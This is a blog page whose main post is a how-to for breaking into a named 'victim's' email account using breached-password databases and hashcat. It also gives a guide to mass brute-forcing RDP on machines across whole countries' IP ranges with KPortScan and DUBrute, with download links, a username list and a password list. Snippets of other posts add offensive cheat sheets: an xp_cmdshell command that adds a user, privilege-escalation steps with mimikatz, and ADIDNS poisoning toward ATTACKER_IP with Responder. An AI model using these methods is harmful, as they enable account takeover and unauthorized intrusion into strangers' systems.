Skip to main content

Random Notes

 

 

 

Cracking an email password 

## Step 1 The first thing you'll want to do is to go to https://haveibeenpwned.com/ and https://dehashed.com/ to find data breaches your victim is in. 9/10 times, they will be in at least one data breach if you're using an email address they use to sign up for accounts.

## Step 2
You're gonna want to go to https://rf.ws/databases and find the databases they're in, and unlock them (they're all 8 credits, you get 1-2 credits from posting on the forums). Prioritize ones with weak hashing algorithms or plaintext passwords.

## Step 3
Once you have your databases, download glogg (https://glogg.bonnefon.org/download.html) and use it to search for your victim's email address in your databases. 7/10 times, your victim will be in a breach that stores plaintext passwords, or in Collection #1-5/Antipublic data, though if you only manage to get password hashes, you can use hashcat (https://hashcat.net/hashcat/) to crack them.
Cracking Machines with RDP Access

1- You need a good I.P. Scanner; Here's KPortScan-3.0 which will get the job done.

Download: https://anonfiles.com/1921x2E6od/KPortScan_3.0_zip

What it looks like:


https://imgur.com/a/TTvUyH7


Now, you need IP's.


Go to this Website: https://www.countryipblocks.net/country_selection.php


https://imgur.com/a/617VXyS


Then Select the Country you want the RDP's to be from


https://imgur.com/a/55oZ0HP


Next, Save the IP ranges and import them into KPORT that you downloaded earlier


https://imgur.com/a/w14SXQR


Import IP's, do not mess with default settings and click start!


When it's done, it will spit out a .txt file with all the IP's


Now, that we have that juicy juicy IP list, we need to start the brute process.


For this; We're going to use DUBrute


Download: https://anonfiles.com/L433x2Eeo6/DUBrute_zip


Run DUBRUTE and follow the steps in the following images:


https://imgur.com/a/QbEz3Op


Next, Import your IP List from KPORT


https://imgur.com/a/n6KEdlj


You're almost ready; if you're not satisfied with the preexisting common password list that is provided, simply find one off the forums.


Before starting, make sure you edit your settings in CONFIG of DEBRUTE; if you have 2GB ram, set the Threads to 100, if you have 4GB ram, Set the threads to 200; ect.


https://imgur.com/a/uq7qzOD


For the Usernames in Debrute Use the following generic common logins:

administrator

admin
admin1
user
user1
user2
test
test1
test2
remote
server
manager
root
support
scanner
scan
temp

For passwords use this common password list: https://throwbin.io/6IsoAzQ


Now just click START and good luck!


The successful cracks will be in a .txt in the same folder 

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/